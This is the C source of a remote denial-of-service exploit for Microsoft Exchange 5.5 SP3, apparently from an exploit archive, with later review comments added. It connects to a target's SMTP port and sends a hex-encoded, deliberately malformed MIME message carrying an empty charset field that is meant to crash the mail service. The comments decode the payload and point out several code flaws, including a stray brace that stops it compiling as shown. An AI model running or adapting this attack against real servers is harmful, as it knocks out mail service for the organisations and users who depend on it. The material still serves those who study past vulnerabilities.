Remote denial of service exploit for Microsoft Exchange 5.5 SP3 Internet Mail Service and Information Store. The bug is in the handling of a line containing Content="".
0c9cfdbafe736d4492e5824460e8cf1c11123d2a6f395721ed470ff9d5905c32
/*
* Okay, now THIS is lame.
*
* TESSA: The Exchange Simple Service Assimilator
* ----------------------------------------------
*
* This will crash a 'Microsoft Exchange 5.5 SP3 Internet Mail Service
* and Information Store' (what's in a name)
*
* For people who got a little brains.. translate the shellcode, it will become
* more clear for you.
*
* by incubus <incubus@securax.org> http://securax.org/incubus
*
* All my love: Tessa.
* Respect: #securax@efnet, mr_magnet, axess, f0bic, lamagra and steven.
*
* Respect and words of thank to Noam @ Beyondsecurity.
*
*/
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#define SMTP_PORT 25 /* default destination port, used when no port argument is given (see main) */
int main(int argc, char **argv){
/*
 * Entry point.
 *
 * argv[1] : target host name or IP address (required; usage is printed
 *           and the program exits 0 if it is missing).
 * argv[2] : optional TCP port; defaults to SMTP_PORT when absent.
 *
 * Resolves the host, opens one TCP connection, writes the fixed buffer
 * below with a single send() without ever reading a server response,
 * prints "Done" and closes the socket.  Resolver, socket and connect
 * failures exit with status -1.
 *
 * NOTE(review): there is no return statement; the success path relies on
 * C99's implicit return 0 from main.
 */
int i, sock, result; /* NOTE(review): i is declared but never used */
unsigned int port;
struct sockaddr_in name; /* never zero-initialised; only family/port/addr are set below */
struct hostent *hostinfo;
/*
 * Despite the original comment this is not shellcode: every byte of the
 * literal is printable ASCII or CR/LF.  Decoded, it is one pipelined SMTP
 * transaction -- HELO, MAIL FROM: root@microsoft.com, RCPT TO:
 * administrator, DATA -- followed by a "MIME-Version: 1.0"
 * multipart/alternative message.  Its single text/plain part carries the
 * parameter line `charset = ""` (the malformed field the description at
 * the top of the page attributes the crash to), a body line
 * "This message is test", the closing boundary, a " .\r\n" line and QUIT.
 * Header lines and their parameters are separated by CRLF CRLF pairs
 * rather than plain folding, so the message is deliberately malformed.
 *
 * The literal is 374 characters; buf is 384 bytes, so the remaining
 * 10 bytes stay zero-filled and are sent too (see the send() below).
 */
char buf[384] = "\x48\x45\x4c\x4f\x0d\x0a\x4d\x41\x49\x4c\x20\x46\x52\x4f\x4d\x3a"
"\x20\x72\x6f\x6f\x74\x40\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e"
"\x63\x6f\x6d\x0d\x0a\x52\x43\x50\x54\x20\x54\x4f\x3a\x20\x61\x64"
"\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x0d\x0a\x44\x41\x54"
"\x41\x0d\x0a\x0d\x0a\x4d\x49\x4d\x45\x2d\x56\x65\x72\x73\x69\x6f"
"\x6e\x3a\x20\x31\x2e\x30\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d"
"\x54\x79\x70\x65\x3a\x20\x6d\x75\x6c\x74\x69\x70\x61\x72\x74\x2f"
"\x61\x6c\x74\x65\x72\x6e\x61\x74\x69\x76\x65\x3b\x0d\x0a\x0d\x0a"
"\x20\x20\x20\x20\x20\x20\x62\x6f\x75\x6e\x64\x61\x72\x79\x3d\x22"
"\x3d\x5f\x20\x42\x6f\x75\x6e\x64\x61\x72\x79\x20\x31\x2d\x4b\x54"
"\x77\x45\x76\x34\x6a\x59\x38\x34\x48\x6b\x22\x0d\x0a\x0d\x0a\x20"
"\x2d\x2d\x3d\x5f\x20\x42\x6f\x75\x6e\x64\x61\x72\x79\x20\x31\x2d"
"\x4b\x54\x77\x45\x76\x34\x6a\x59\x38\x34\x48\x6b\x0d\x0a\x0d\x0a"
"\x20\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74"
"\x65\x78\x74\x2f\x70\x6c\x61\x69\x6e\x3b\x0d\x0a\x0d\x0a\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x63\x68\x61\x72\x73\x65\x74\x20\x3d"
"\x20\x22\x22\x0d\x0a\x0d\x0a\x20\x43\x6f\x6e\x74\x65\x6e\x74\x2d"
"\x54\x72\x61\x6e\x73\x66\x65\x72\x2d\x45\x6e\x63\x6f\x64\x69\x6e"
"\x67\x3a\x20\x37\x62\x69\x74\x0d\x0a\x0d\x0a\x20\x54\x68\x69\x73"
"\x20\x6d\x65\x73\x73\x61\x67\x65\x20\x69\x73\x20\x74\x65\x73\x74"
"\x0d\x0a\x0d\x0a\x20\x2d\x2d\x3d\x5f\x20\x42\x6f\x75\x6e\x64\x61"
"\x72\x79\x20\x31\x2d\x4b\x54\x77\x45\x76\x34\x6a\x59\x38\x34\x48"
"\x6b\x2d\x2d\x0d\x0a\x20\x0d\x0a\x20\x2e\x0d\x0a\x20\x0d\x0a\x20"
"\x0d\x0a\x51\x55\x49\x54"; /* end of the fixed SMTP transaction */
if (argc < 2){
fprintf (stdout, "Microsoft Exchange 5.5 SP3 Denial of Service\n--------------------------------------------\n");
fprintf (stdout, "You better do %s <ipaddress or hostname> <port>\n", argv[0]);
fprintf (stdout, "by incubus <incubus@securax.org>\n\n");
exit(0);
}
/* NOTE(review): atoi() gives no error indication and the value is not
 * range-checked; anything above 65535 is silently truncated by htons(). */
if (argc < 3) port = SMTP_PORT;
else port = atoi(argv[2]);
hostinfo=gethostbyname(argv[1]);
if (!hostinfo){
herror("Damn!"); exit(-1); /* herror() is correct here: gethostbyname sets h_errno */
}
name.sin_family=AF_INET;
name.sin_port=htons(port);
name.sin_addr=*(struct in_addr *)hostinfo->h_addr; /* first address of the resolved list only */
sock=socket(AF_INET, SOCK_STREAM, 0);
/* NOTE(review): socket() and connect() report failure via errno, not h_errno,
 * so herror() prints a resolver message unrelated to the real error;
 * perror() would be the matching call for both of the next two checks. */
if (sock < 0) { herror("Damn!"); exit(-1); }
result=connect(sock, (struct sockaddr *)&name, sizeof(struct sockaddr_in));
if (result != 0) { herror("Damn!"); exit(-1); }
/* NOTE(review): sizeof(buf) is the full 384-byte array, so the 10 trailing
 * NUL bytes go on the wire as well; the return value is not checked, so a
 * short send goes unnoticed. */
send(sock, buf, sizeof(buf), 0);
fprintf (stdout, "Done\n");
close(sock); /* NOTE(review): close() is declared in <unistd.h>, which is not included -- implicit declaration */
}
} /* NOTE(review): stray closing brace; main() is already closed on the line above, so this file does not compile as-is */